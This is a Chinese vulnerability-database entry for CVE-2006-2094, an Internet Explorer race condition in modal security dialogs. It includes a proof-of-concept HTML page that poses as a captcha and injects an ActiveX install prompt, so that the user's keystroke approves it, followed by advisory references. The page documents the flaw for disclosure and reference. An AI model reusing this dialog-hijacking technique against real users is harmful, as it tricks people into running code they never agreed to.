Microsoft Internet Explorer 模态对话框操纵漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110145 漏洞类型 竞争条件
发布时间 2006-04-26 更新时间 2006-08-28
CVE编号 CVE-2006-2094 CNNVD-ID CNNVD-200604-558
漏洞平台 Windows CVSS评分 5.1
|漏洞来源
https://www.exploit-db.com/exploits/27744
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200604-558
|漏洞详情
当在安全设置中配置提示符时,WindowsXPServicePack2和WindowsServer2003ServicePack1之前版本中的IE浏览器使用模态对话框验证用户是否要运行ActiveX控件或执行其他有风险操作。这使得用户辅助攻击者可以造成竞争状态,从而欺骗用户点击某一对象或按下实际上应用到用于执行控件的"确定"按键。
|漏洞EXP
source: http://www.securityfocus.com/bid/17713/info

Internet Explorer is prone to a remote code-execution vulnerability through exploiting a race-condition when displaying modal security dialog boxes.

This issue may be exploited to cause users to inadvertently allow remote-code to be executed.


<HEAD>
<TITLE>Internet Explorer ActiveX Installation Vulnerability</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000">
<SCRIPT>

function doInstallControl() {

	document.body.innerHTML +=
		"<OBJECT CLASSID=\"clsid:928626A3-6B98-11CF-90B4-00AA00A4011F\" TYPE=\"application/x-oleobject\" CODEBASE=\"http://activex.microsoft.com/activex/controls/museum/MSSurVid.cab#Version=1,2,0,7\" WIDTH=\"325\" HEIGHT=\"250\">\r\n" +
            	"<PARAM NAME=\"SurroundRect\" VALUE=\"0,0,325,250\">\r\n" +
            	"<PARAM NAME=\"Image\" VALUE=\"ritetree.jpg\">\r\n" +
          	"</OBJECT>";

	document.getElementById("captcha").focus();
}

function doWaitEntry() {

	if (event.keyCode == 78 || event.keyCode == 110) {
		doInstallControl();
	}

}

</SCRIPT>

<FORM ACTION="" METHOD="GET">
Please enter the text you see on the left:<BR><BR>

<B>on3l1y6y8y5y</B> <INPUT TYPE="text" ID="captcha" ONKEYPRESS="doWaitEntry()">

</FORM>

</BODY>
|参考资料

来源:MISC
链接:http://www.squarefree.com/2004/07/01/race-conditions-in-security-dialogs/
来源:BID
名称:17713
链接:http://www.securityfocus.com/bid/17713
来源:OSVDB
名称:22351
链接:http://www.osvdb.org/22351
来源:VUPEN
名称:ADV-2006-1559
链接:http://www.frsirt.com/english/advisories/2006/1559
来源:MISC
链接:http://student.missouristate.edu/m/matthew007/advisories.asp?adv=2006-02
来源:SECTRACK
名称:1015720
链接:http://securitytracker.com/id?1015720
来源:VULNWATCH
名称:20060427PoCforInternetExplorerModalDialogIssue
链接:http://archives.neohapsis.com/archives/vulnwatch/2006-q2/0019.html
来源:FULLDISC
名称:20060426InternetExplorerUserInterfaceRaces,Redeux
链接:http://archives.neohapsis.com/archives/fulldisclosure/2006-04/0759.html
来源:FULLDISC
名称:20040407Raceconditionsinsecuritydialogs
链接:http://archives.neohapsis.com/archives/fulldisclosure/2004-07/0264.html
来源:XF
名称:ie-modal-dialog-code-execution(26111)
链接:http://xforce.iss.net/xforce/xfdb/26111
来源:FULLDISC
名称:20060427PoCforInternetExplorerModalDialogIssue
链接:http://lists.grok.org.